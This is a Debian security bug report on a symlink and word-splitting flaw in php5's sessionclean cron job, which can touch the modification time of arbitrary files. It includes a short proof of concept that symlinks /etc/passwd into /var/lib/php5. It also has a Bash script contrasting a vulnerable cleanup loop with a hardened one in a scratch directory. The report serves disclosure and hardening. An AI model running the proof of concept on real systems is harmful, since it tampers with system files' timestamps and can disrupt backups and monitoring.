Package: php5-common
Version: 5.4.4-14+deb7u14
Tags: security

/usr/lib/php5/sessionclean from [1] enables any process allowed to create entries in /var/lib/php5 to adjust the modification time of any file by waiting for the /etc/cron.d/php5 session cleanup job to run. This requires /proc/sys/fs/protected_symlinks to be set to 0 (off), which is not the default in Debian 7 Wheezy and up, according to information from the Debian security team.
Even for affected systems, the impact might be small, just annoying:
* backup/IDS might be unhappy when a file's modification time is changed every 30min
* some spoolers might work differently, since a stale file could be prevented from reaching the required age for the next action
* some privileged /proc or /sys entries might not handle a modification time update correctly or might react in a strange way
* the sudo credential cache might be affected (not checked)
To my judgement, the session cleanup code does _NOT_ allow creating arbitrary files ("touch -c" is used), hence it would not be possible to use this to create e.g. /etc/suid-debug.
POC:
su -s /bin/bash nobody
cd /var/lib/php5
ln -s /etc/passwd xxx
cat > "xxx yyy"
# wait
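The POC pairs a symlink named xxx with a session file named "xxx yyy", which points at word splitting of the cleaner's file list before touch -c runs. The following Bash is an added example, not Debian's sessionclean (whose exact code is not reproduced here): it contrasts a constructed word-splitting loop with a hardened one that passes names NUL-separated and skips symlinks, replaying the POC layout in a scratch directory with stand-ins for /var/lib/php5 and /etc/passwd. GNU find, stat and touch are assumed.

```shell
#!/bin/bash
# Added example, not Debian's /usr/lib/php5/sessionclean: contrasts a
# cleanup loop that word-splits find output with one that does not.

# Weak pattern (constructed illustration): $(...) splits "DIR/xxx yyy" into
# "DIR/xxx" and "yyy"; touch -c on the symlink DIR/xxx then follows it.
weak_touch_sessions() {
    for f in $(find "$1" -mindepth 1 -maxdepth 1 -type f); do
        touch -c "$f"
    done
}

# Hardened pattern: NUL-separated names keep "xxx yyy" whole, and -type f
# without -L never matches a symlink, so xxx -> target is never touched.
safe_touch_sessions() {
    find "$1" -mindepth 1 -maxdepth 1 -type f -print0 | xargs -0 -r touch -c --
}

# run_scenario FUNC: rebuild the POC layout in a scratch dir with a
# stand-in target, call FUNC on the session dir, and echo "changed" or
# "unchanged" depending on whether the target's mtime moved.
run_scenario() {
    local tmp sess target before after
    tmp=$(mktemp -d)
    sess="$tmp/sessions"                # stands in for /var/lib/php5
    target="$tmp/target"                # stands in for /etc/passwd
    mkdir "$sess"
    : > "$target"
    touch -d '2000-01-01 00:00:00' "$target"
    ln -s "$target" "$sess/xxx"         # symlink named as in the POC
    : > "$sess/xxx yyy"                 # session name containing a space
    before=$(stat -c %Y "$target")
    "$1" "$sess"
    after=$(stat -c %Y "$target")
    rm -rf "$tmp"
    if [ "$before" = "$after" ]; then echo unchanged; else echo changed; fi
}

# Check for the precondition the report names (Linux sysctl; 1 = protected).
protected_symlinks_enabled() {
    [ "$(cat /proc/sys/fs/protected_symlinks 2>/dev/null)" = "1" ]
}

echo "weak loop:     target mtime $(run_scenario weak_touch_sessions)"
echo "hardened loop: target mtime $(run_scenario safe_touch_sessions)"
```

Run as an unprivileged user; the scratch directory is owned by that user, so the weak loop follows the symlink regardless of the protected_symlinks setting, which only governs sticky world-writable directories.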
[1] http://http.us.debian.org/debian/pool/main/p/php5/php5-common_5.4.4-14+deb7u14_i386.deb